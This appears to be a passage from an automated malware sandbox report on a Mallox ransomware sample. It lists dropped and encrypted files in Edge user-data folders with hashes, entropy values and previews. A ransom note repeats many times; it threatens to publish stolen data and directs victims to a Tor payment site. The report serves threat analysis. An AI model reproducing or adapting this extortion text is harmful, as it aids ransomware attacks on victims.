                    SHA1:FB8B771E9D71F99B771E8AA5170433B1BACB7F4E
                    SHA-256:EEE2B269622650A63AF06BCC178374990833FB83E0C0088A52665BDA8D835FF0
                    SHA-512:0CD2BDF9D269E7375FF469CB7723D90432E54D35714D0E581F547D9266D53F13DBAE426F8487EB6B5A6EDB1D627F550EB9EEA67688440C81C1B2B985D3BFCC6B
                    Malicious:true
                    Preview:.Vc..Q.O.t.|C.U..V.\m8.S..o.5.A.]. .o.......*..Wz..n.D..s..r.^..~`...1p.[f...(1M....i..)T...xXGj..^.I..)....^..j..Fk.N.s...$...X{..m.K...8.*C.]/.+.....m`...^...R~QN.L-x.JmR......jw\.7.'.A.@...(.,..u...D......N.*..R...J........,.]d_h].)..{.}I.Q..$..t7.=.I...C...p...e#..S.N.A.....C@).t...]...BpQ6.m.L..lW.)..u6z.C..F.}z.$..1...oh.Q..?L...F.........$..._...A..Cs.X...}....9..........QH..>...c.)..p..V.<..C...R.)..BN..!U3.d.6mhh..D..0.%.....c...x'.*.._.O......~...-..a...xg=......(.~S..9(.....cW.8.....{......k.3...\.J....f..7...7S....N.....]o6v.V+.3..NU{..T&..t..e;.1Ud.....75H.....<.`_..sT.fv.........k..$.t.U.++....].Q9LP.|..M.....@E.#...d...Z.F..po...7.$...f~Q...,...3.*.aI...d.....qw...^J&.......)~\....Q.2e...."p,............k........v...6.f.........MScU0~..`j>u.._.w.p./u...........*.e..g..;...#k.l...!)5...0..........R..9,WK.>...HB.*.a..F..+X..l.a...I..tf|.w.,.[+......^..2....].\.`.r..E/.Y..O..".].x.+..6..<.m.U..HlS=..9..3..6.Hnbz..1..bq....";....o>.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50\Part-ZH

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):860131
                    Entropy (8bit):7.999768140398526
                    Encrypted:true
                    SSDEEP:24576:DRzRFUy/SOGltS+GwiKhBUzpjnOAwTY5dwEzjFjU:tdUHSVrsAwTgdwEz2
                    MD5:B1C145361D81B9E600E1FD557EA4AB11
                    SHA1:19D637D807FE713FB7D527123A7BFE15A7298694
                    SHA-256:1C9F6F785F0BDA5B1E4A1E07BFF15B1CD6FA6A15C1EC6641138920F2D533229D
                    SHA-512:957C272182D1AD4039659C0FE3F3D61C0A1859F9D6CBC60AA318B989143A4F5CDC07BB329C2D66782FC5AC3E765EE2155CE36B73CD13086667B964A8C1D0A633
                    Malicious:true
                    Preview:t......x.7..B(..s....=.........!.q..A...14..:...Mz.g=.|....z..D...j..6..'..M..:.5........#..L..b.MLt......JT.n.']jM..>W..Bcg.l....5|..m...{9n......<.....o..1.(c.~.tn.lJy!);r..........grW.#..8G!.x_.G..YG..y..N...9.;.C..=.... .|.@..$...s.4....v.q.j.m..z...{.+.!.(...7.....cB....cV.w.@.TD..b.'BQ.../3`...v....cAKQ.m..<..)6yL..Z..G..A9T}.2.(....@.'.8..&....$M.i..[.!.M^^.....$....,.y$..m]../.Ss...,..K;.FZv.{.......3.).g..T.0q...1dG..mb.zB......GO..d......2..L.7r......W.......S<j`}...*....d7...1.O<..,j..j..Cd..Q..::...W..Gh..e.O..y.?,#.7...5..Wc..I.4..._ v.N..4.6..Y...._.=>..m..d,..o....8.u......?.....k.Rl.....'..>..?r.\.U.q.T.t.....w.q5...#.....UX,.........z..Y.........?<.PA..l..m.%..`.~*H..:..vvA.>...[.Q.?.X.6f......3.g.....Gq.Z*..7...s....[...N:9vk.V..v...2.p]&...Fe..."uvf.\.....r...9c.)..|..4..vyd.5..c.]..j.t....I.3.;E..p...T.....^o:=.&...=...........a.8..t..u)X...Y0.@../.F\..|h.F..8M.Y...7m.=.3.^...S..87bv.Rc..f..?..Y.<v...."....>TQ..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\2023.9.4.1\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\2023.9.4.1\_metadata\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting\1.20231005.1.0\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting\1.20231005.1.0\typosquatting_list.pb

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):169183
                    Entropy (8bit):7.998846053061141
                    Encrypted:true
                    SSDEEP:3072:ilAVDolShKDgPdegokW7ubY0Nams/Xg1J8/c/Oa2TwuuurPnex:3oYYD+egwK7zs/eJWyOzFdPnO
                    MD5:288C7F0A328F081FB75350EA1EC39B91
                    SHA1:7CC47120FE4EDB3E461E393C341C3E88AC3308A0
                    SHA-256:A5009A814C3A18EB7553BCE3827CBB9472243C7C7A62F54E105F3A5657E3C593
                    SHA-512:8594E7649B4A7B86B89E1A1191BC5B3A716FAFDCF7C30D16C45104EE27B8ABEFCA55C3A82FF0B99E9F4A08E1999B285E3647DA9BC854245960242648DECD5DA6
                    Malicious:true
                    Preview:..R..m.I@..).$.....L-R,s..~.{.>..*`...uT.....VRUV.x.3..Sch.....l.:A...n....G..N...L)N.(+.6...&..Gt<.R...1c...X...y...1[.<...C.._P..2H.....Z..]y9.M0..b^..F.1.&c.H.>[<%.$v.R&...d.K..p.rv. ..OM.......l.^..w..u....~.+.$&{m.c......Y.T.....>W...... .D.'.rL.u..0.;.....rk...z;.V.C.........q`<A..dF.55?..I......m..^.......Wi.u.{......$.Z..y...;.7?@/O.....!......E2...S..wY.7.)..........AU..z.s..V8.....o...........0.1w..}.......;..".....zO..7.../....B./.w.@.Y.oF@!.......C..9.o.yL5.G.U.3#I..>..I.VV.yU3.....H...v[..}}/........|/{..F|...&....<J.cO.k.T..OM.../@..B.,~J/..=.]n9.m&.;..p.&I`.3......=..p..Z./^.`v....-E..s.7........LtxL.Y..4=....5...a..h....'O.L..g......-.S.K.u.........g.h......>M*..**.......hw.f.../...7-...+RVs..+..;.;...C...M.e...qN...'...!A)........FZb...@.P8..L....!A.@Z@.3....0.n....>.....)h..bl..-....GA...&..0T.<[B.'........l.I+..y1.gm|0w..1m<].Wr0.P#.em........[.9e...........I..6...........<9<..cb..\...[C]'.MKQ.z.;ez.b..S....H..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Web Notifications Deny List\2.0.0.4\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Web Notifications Deny List\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent\1.0.0.5\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cu.hyb

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):52950
                    Entropy (8bit):7.996499504036127
                    Encrypted:true
                    SSDEEP:1536:83QGERpgGC6K8uzuNeg2pYgpr4xp7M3ryVK5:83vGCDBa2nSp4OVg
                    MD5:4BD44F181F15DC757AD213F9F6756B1A
                    SHA1:8E0424EF1A03CA4495542BC5B5C4BE287F3E2184
                    SHA-256:18C2B60E0DBAC4084767BFC09280BA80848C3A4B55E5D3A43C8513250FCED946
                    SHA-512:5B4668721CEE8B5E9FB07ADE558D9ABAAF2638D90CCEFDAF4C3AACF13FD45089D05F5714D6D95C79E4889A7C340800FD68E1848988E6FBEEAF7EECF07CE7F6F8
                    Malicious:true
                    Preview::...Q.>....~?..|.w.L=.y.....E......A.....Z..+C...m.6pK.ea ...fy._..;p.)>.@..N.L..!..0.e..K)l......^.x>..=..H.X#.$..i..|8.V.......`J^.e.........p../.q.a!....r~.."&.;...Lj........65.A..$..?*..2...].&5\.u.`.w.......[.Q....w.1.[y.m=.9J.i.gv.Z..\.K......!}W...T.M..(..j.....*.Trp..7.T..`.&.,.....G'.>.]j.0.<s.i[.*a.?..........U.......[=di ..pG.:.J........qq..,&..H..!.....(...p..F......c.>.).....7N.eM.S.}@.;.X#.q.QV......{......L_....F..6.{lb/....0d..N......../....A...l.`..]...UZl..<....E.V..++k...H.z.. ~L..(...........p...}...9."Gy.....\....L.y,Y.\j....B.......~...}.[....L....k5CZ...qj.......A..J...........p.TTR.G..D..Y.i...+l.....A..bt....T...r(.IU.~=INV....2..6..`..[S....UN.....g.t..n..D...Y....J..iI'..V._H..gZ...x.9m:Q.....{|2...'D...F......P..i.~0..2. 3....r..c...t.J....!....$.f..`...~....[.a...S-......R...`.Z|-..~X.l#.Z.5.C.....m.16.U.P.......r.@l...).8/G?...T.+......x.OO7.t.-....T..o`u..V...b.@.c....v.~..p...\.......G.....P?+.......).a

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cy.hyb

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):36021
                    Entropy (8bit):7.995316741872214
                    Encrypted:true
                    SSDEEP:768:XJdiSduq9lA844PFBiP54A0RHwrXmESjYHpOCpgnY:XNdNjriBN0RQr2ESJCpx
